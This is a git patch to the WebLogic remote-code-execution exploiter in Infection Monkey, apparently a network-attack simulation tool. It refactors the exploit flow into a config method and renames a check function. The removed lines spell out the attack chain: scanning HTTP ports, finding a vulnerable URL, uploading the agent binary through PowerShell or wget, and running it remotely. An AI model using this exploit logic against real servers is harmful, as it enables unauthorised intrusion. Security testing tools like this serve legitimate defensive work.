From 8fd42abd5d7e42a2553dcead47948211295a1651 Mon Sep 17 00:00:00 2001
From: Vakaris <vaoxygen@gmail.com>
Date: Wed, 22 Aug 2018 19:00:14 +0300
Subject: [PATCH] Refactored according to final web_rce framework changes

---
 infection_monkey/exploit/weblogic.py | 40 +++++-----------------------
 1 file changed, 7 insertions(+), 33 deletions(-)

diff --git a/infection_monkey/exploit/weblogic.py b/infection_monkey/exploit/weblogic.py
index c2b6e81a9..4ea80c1d4 100644
--- a/infection_monkey/exploit/weblogic.py
+++ b/infection_monkey/exploit/weblogic.py
@@ -50,38 +50,12 @@ class WebLogicExploiter(WebRCE):
                                                        'win32': 'monkey-32.exe',
                                                        'win64': 'monkey-64.exe'})
 
-    def exploit_host(self):
-        # Get open ports
-        ports = self.get_ports_w(self.HTTP, ["http"])
-        if not ports:
-            return False
-        # Get urls to try to exploit
-        urls = self.build_potential_urls(ports, URLS)
-
-        # Checking takes a lot of time, so we check until we get exploitable url and stop
-        vulnerable_urls = []
-        for url in urls:
-            # Get full URL
-            if self.test_exploit(url):
-                vulnerable_urls.append(url)
-                break
-        self._exploit_info['vulnerable_urls'] = vulnerable_urls
-        if not vulnerable_urls:
-            return False
-
-        data = self.upload_monkey(vulnerable_urls[0], {'windows': POWERSHELL_HTTP_UPLOAD, 'linux': WGET_HTTP_UPLOAD})
-
-        # We can't use 'if not' because response may be ''
-        if not data or data['response'] is False:
-            return False
-
-        if self.change_permissions(vulnerable_urls[0], data['path']) is False:
-            return False
-
-        if self.execute_remote_monkey(vulnerable_urls[0], data['path']) is False:
-            return False
-
-        return True
+    def get_exploit_config(self):
+        exploit_config = super(WebLogicExploiter, self).get_exploit_config()
+        exploit_config['blind_exploit'] = True
+        exploit_config['stop_checking_urls'] = True
+        exploit_config['url_extensions'] = URLS
+        return exploit_config
 
     def exploit(self, url, command):
         empty_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
@@ -158,7 +132,7 @@ class WebLogicExploiter(WebRCE):
             self._stopped = True
             return
 
-    def test_exploit(self, url):
+    def check_if_exploitable(self, url):
         local_port = get_free_tcp_port()
         local_ip = get_interface_to_target(self.host.ip_addr)
         httpd = WebLogicExploiter.HTTPServer(local_ip, local_port)